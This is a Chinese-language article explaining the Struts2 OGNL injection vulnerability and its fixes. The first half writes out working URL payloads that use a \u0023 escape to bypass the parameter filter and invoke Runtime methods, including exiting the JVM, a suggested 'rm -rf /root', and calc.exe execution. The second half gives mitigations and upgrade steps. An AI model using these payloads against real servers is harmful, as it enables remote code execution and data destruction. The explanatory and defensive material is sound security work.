一,漏洞存在的地方和原理
Struts2的核心是使用的webwork框架,處理 action時通過調用底層的getter/setter方法來處理http的參數,它將每個http參數聲明爲一個ONGL(這裏是ONGL的介紹)語句。當我們提交一個http參數:
Java代碼
- ?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL將它轉換爲:
Java代碼
- action.getUser().getAddress().setCity("Bishkek")
- action.getUser().setFavoriteDrink("kumys")
這是通過ParametersInterceptor(參數過濾器)來執行的,使用用戶提供的HTTP參數調用 ValueStack.setValue()。
爲了防範篡改服務器端對象,XWork的ParametersInterceptor不允許參數名中出現“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻擊者就可以繞過保護,修改保護Java方式執行的值:
此處代碼有破壞性,請在測試環境執行,嚴禁用此種方法進行惡意攻擊
Java代碼
- ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1
轉義後是這樣:
Java代碼
- ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#[email protected]@getRuntime()))=1
OGNL處理時最終的結果就是
Java代碼
- java.lang.Runtime.getRuntime().exit(1);
類似的可以執行
Java代碼
- java.lang.Runtime.getRuntime().exec("rm –rf /root")
,只要有權限就可以刪除任何一個目錄。
https://example.com/xx.action?XXParam=#%20context'xwork.MethodAccessor.denyMethodExecution'l=false,#-memberAccess.allowPrivateAccess=true,#result=@java.lang.Runtime@getRuntime.exec('calc.exe')這裏攻擊者通過XXParam傳入OGNL表達式,被服務器解析,執行Java語言代碼,修改xwork.MethodAccessor.denyMethodExecution屬性的值爲false修改_memberAccess.allowPrivateAccess的屬性的值爲true ,並執行java.lang.Runtime.getRuntime().exec('calc.exe")命令調用。
設置struts.ognl.allowStaticMethodAccess爲false,設置_memberAccess.allowPrivateAccess爲false ,設置
xwork.MethodAccessor.denyMethodExecution爲true ,並採用白名單策略對用戶輸入的OGNL表達式進行過濾。
二,消除的方法是
大概有四種解決方案,方案如下。建議使用第四中方案。
1.升級到struts2.2版本。
這個可以避免這個問題,經測試發現新版本雖然解決了上述的漏洞,但是新的問題是strus標籤出問題了。
<s:bean id="Test" name="cn.com.Test"></s:bean>
<s:property value="#Test.getType().get(cType.toString())" />
這樣的標籤在struts2.0中是可以使用的,但是新版中就不解析了,原因就是“#”的問題導致的,補了漏洞,正常的使用也用不了了。
所以sebug網站上的建議升級到2.2版本是不可行的。
2.struts參數過濾。
<interceptor-ref name="params">
<param name="excludeParams">.*\\u0023.*</param>
</interceptor-ref>
這個可以解決漏洞問題,缺點是工作量大,每個項目都得改struts配置文件。如果項目裏,是引用的一個類似global.xml的配置文件,工作量相應減少一些。
3.在前端請求進行過濾。
比如在ngnix,apache進行攔截,參數中帶有\u0023的一律視爲攻擊,跳轉到404頁面或者別的什麼頁面。這樣做的一個前提就是沒人把#號轉碼後作爲參數傳遞。
請求如果是get方式,可以進行過濾,如果是post方式就過濾不到了,所以還是應該修改配置文件或更新新的jar包。
4、全面升級。struts2.1.8.1升級至2.3.24
1、新增JAR包:commons-lang3-3.2.jar 和 javassist-3.11.0.GA.jar
2、替換JAR包:
commons-fileupload-1.2.1.jar —->commons-fileupload-1.3.1.jar
commons-io-1.3.2.jar —–>commons-io-2.2.jar
freemarker-2.3.15.jar —->freemarker-2.3.22.jar
ognl-2.7.3.jar —-> ognl-3.0.6.jar
struts2-core-2.1.8.1.jar —-> struts2-core-2.3.24.jar
xwork-core-2.1.6.jar —–> xwork-core-2.3.24.jar
3、保留原有的commons-lang.jar,org.apache.commons.lang.StringUtils類被org.apache.commons.lang3.StringUtils替換了
4、修改web.xml, 將org.apache.struts2.dispatcher.FilterDispatcher 改爲 org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter